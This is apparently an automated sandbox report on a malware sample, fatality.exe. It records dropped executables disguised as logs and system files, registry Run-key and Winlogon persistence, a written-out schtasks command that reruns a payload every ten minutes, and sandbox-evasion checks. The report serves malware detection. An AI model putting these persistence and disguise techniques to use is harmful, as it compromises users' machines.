                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\fatality.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\d81cfa058c78b8
                                    Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\7-Zip\Lang\d81cfa058c78b8
                                    Source: fatality.exe Static file information: File size 3319076 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe, fatality.exe, 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    Source: C:\Users\user\Desktop\fatality.exe Unpacked PE file: 0.2.fatality.exe.de0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\blockcomSession\containerReview.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                    Source: C:\blockcomSession\containerReview.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                    Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\__tmp_rar_sfx_access_check_5458578
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name:
                                    Source: fatality.exe Static PE information: section name: cheat
                                    Source: fatality.exe Static PE information: section name: entropy: 7.996600566459323
                                    Source: fatality.exe Static PE information: section name: entropy: 7.979119292488003
                                    Source: fatality.exe Static PE information: section name: entropy: 7.461008587981874
                                    Source: fatality.exe Static PE information: section name: entropy: 7.941503255275258
                                    Source: fatality.exe Static PE information: section name: entropy: 7.853249739854464
                                    Source: fatality.exe Static PE information: section name: .rsrc entropy: 7.51495699813517
                                    Source: fatality.exe Static PE information: section name: cheat entropy: 7.982180837051556
                                    Source: containerReview.exe.0.dr Static PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe.5.dr Static PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe0.5.dr Static PE information: section name: .text entropy: 7.568689515066778
                                    Source: containerReview.exe.5.dr Static PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe1.5.dr Static PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe2.5.dr Static PE information: section name: .text entropy: 7.568689515066778

                                    Persistence and Installation Behavior

                                    Source: C:\blockcomSession\containerReview.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\jPEOVQoM.log
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\ProgramData\dbg\containerReview.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\VquIdqjl.log
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\RLUzQxgL.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\nCWNxMEA.log
                                    Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\containerReview.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\PRRjZxCV.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\GgZbKUMi.log
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\RUDRugHQ.log
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\blockcomSession\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\LTranRbW.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\HTJtRROP.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\ucFnGTXv.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe File created: C:\Users\user\Desktop\eTDxNkzS.log
                                    Source: C:\blockcomSession\containerReview.exe File created: C:\Users\user\Desktop\yCQlabwB.log

                                    Boot Survival

                                    Source: C:\blockcomSession\containerReview.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\blockcomSession\containerReview.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                    Source: C:\blockcomSession\containerReview.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ
                                    Source: C:\blockcomSession\containerReview.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ
                                    Source: C:\blockcomSession\containerReview.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                    Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\dbg\containerReview.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1190000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1ABE0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: A10000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: 1A7D0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: 1610000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: 1B3B0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 14B0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1AFA0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1130000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1AE60000 memory reserve | memory write watch
                                    Source: C:\ProgramData\dbg\containerReview.exe Memory allocated: F80000 memory reserve | memory write watch
                                    Source: C:\ProgramData\dbg\containerReview.exe Memory allocated: 1AB70000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe Memory allocated: 1730000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe Memory allocated: 1CF0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: 15C0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Memory allocated: 1B000000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1600000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Memory allocated: 1B370000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\dbg\containerReview.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\fatality.exe Window / User API: threadDelayed 621
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jPEOVQoM.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VquIdqjl.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nCWNxMEA.log
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RLUzQxgL.log
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PRRjZxCV.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GgZbKUMi.log
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RUDRugHQ.log
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LTranRbW.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HTJtRROP.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ucFnGTXv.log
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eTDxNkzS.log
                                    Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yCQlabwB.log
                                    Source: C:\blockcomSession\containerReview.exe TID: 5400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 7352Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 5032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 1600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7232Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7248Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\dbg\containerReview.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\dbg\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEA69B FindFirstFileW,FindFirstFileW,0_2_00DEA69B
